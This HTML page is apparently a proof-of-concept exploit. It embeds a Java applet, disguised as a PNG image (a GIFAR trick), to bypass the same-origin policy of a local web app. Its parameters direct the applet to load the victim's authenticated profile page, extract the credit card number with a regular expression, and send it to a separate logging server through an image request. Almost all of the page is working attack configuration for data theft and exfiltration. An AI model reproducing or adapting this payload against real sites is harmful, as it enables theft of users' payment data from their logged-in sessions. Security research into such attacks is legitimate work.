<html>
<body>

<!-- scheme/domain/port where this page is served must be in the list of allowed applet sources of victim Java Plugin settings or applet mus be signed by valid CA -->
<object type="application/x-java-applet" height="100" width="200">
    <!-- the applet's jar file path -->
    <param name="codebase" value="http://localhost:8080/marathon/" /> <!-- scheme/domain/port must be in the list of allowed applet sources of victim Java Plugin settings or applet mus be signed by valid CA -->
    <!-- the applet's jar file filename (can even be served as GIFAR): -->
    <param name="archive" value="PhotoLoader?photo=SopApplet-jar.png" />
    <!-- the applet's class name (default package): -->
    <param name="code" value="SopApplet" />

    <!-- payload: the URL (relative to above "codebase" param value): -->
    <param name="payload.relativeUrlWithinVictimSession" value="secured/profile.do"/>
    <!-- TODO: add flag if GET/POST/DELEET etc. as well as certen headers should be used for internal request): -->
    <!-- payload: regexp with capture group of what to extract: -->
    <param name="payload.regExpOfSenitiveContentForExtraction" value="name=&quot;creditcardNumber&quot; maxlength=&quot;19&quot; size=&quot;20&quot; value=&quot;([0-9a-fA-F\-]+)&quot;"/>
    <!-- payload: the target URL to send the sniffed data to (via GET request [TODO: make configurable]): -->
    <param name="payload.dataExfiltrationJavaScript" value="i=new Image();i.src='http://localhost:7777/log.jsp?exfiltrated_content=$$$'"/>
</object>

</body>
</html>
